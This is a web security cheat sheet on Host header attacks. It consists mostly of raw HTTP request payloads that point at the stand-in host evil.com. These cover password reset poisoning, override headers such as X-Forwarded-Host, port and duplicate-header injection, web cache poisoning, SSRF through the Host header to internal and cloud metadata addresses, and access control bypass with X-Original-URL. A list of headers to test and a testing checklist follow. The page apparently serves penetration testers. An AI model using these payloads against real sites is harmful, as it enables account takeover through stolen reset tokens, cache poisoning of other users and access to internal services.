Skip to content
Web Security

Host Header Attacks

Host header injection and web cache poisoning

Basic Host Header Injection

HTTP 
# Password reset poisoning
GET /reset-password?email=victim@target.com HTTP/1.1
Host: evil.com

# Victim receives reset link with evil.com

Injection Techniques

Standard Injection

HTTP 
Host: evil.com

Override Headers

HTTP 
Host: target.com
X-Forwarded-Host: evil.com
X-Host: evil.com
X-Forwarded-Server: evil.com
X-Original-URL: /admin
X-Rewrite-URL: /admin

Absolute URL

HTTP 
GET https://evil.com/path HTTP/1.1
Host: target.com

Port Injection

HTTP 
Host: target.com:evil.com
Host: target.com:@evil.com

Duplicate Headers

HTTP 
Host: target.com
Host: evil.com

Web Cache Poisoning

HTTP 
# Poison cached response
GET /static/script.js HTTP/1.1
Host: target.com
X-Forwarded-Host: evil.com

# Response includes evil.com in content
# Cache stores poisoned response

Common Vulnerabilities

Password Reset

TEXT 
1. Request password reset
2. Intercept, modify Host to evil.com
3. Victim clicks link → token sent to attacker

SSRF via Host

HTTP 
Host: internal-server.local
Host: 169.254.169.254

Access Control Bypass

HTTP 
X-Original-URL: /admin
X-Rewrite-URL: /admin

Headers to Test

TEXT 
Host
X-Forwarded-Host
X-Host
X-Forwarded-Server
X-HTTP-Host-Override
Forwarded
X-Original-URL
X-Rewrite-URL

Testing Checklist

TEXT 
□ Test Host header modification
□ Try X-Forwarded-Host
□ Test absolute URL in request lineCheck password reset flow
□ Test web cache behavior
□ Try access control bypass headers
Back to Cheatsheets
On this page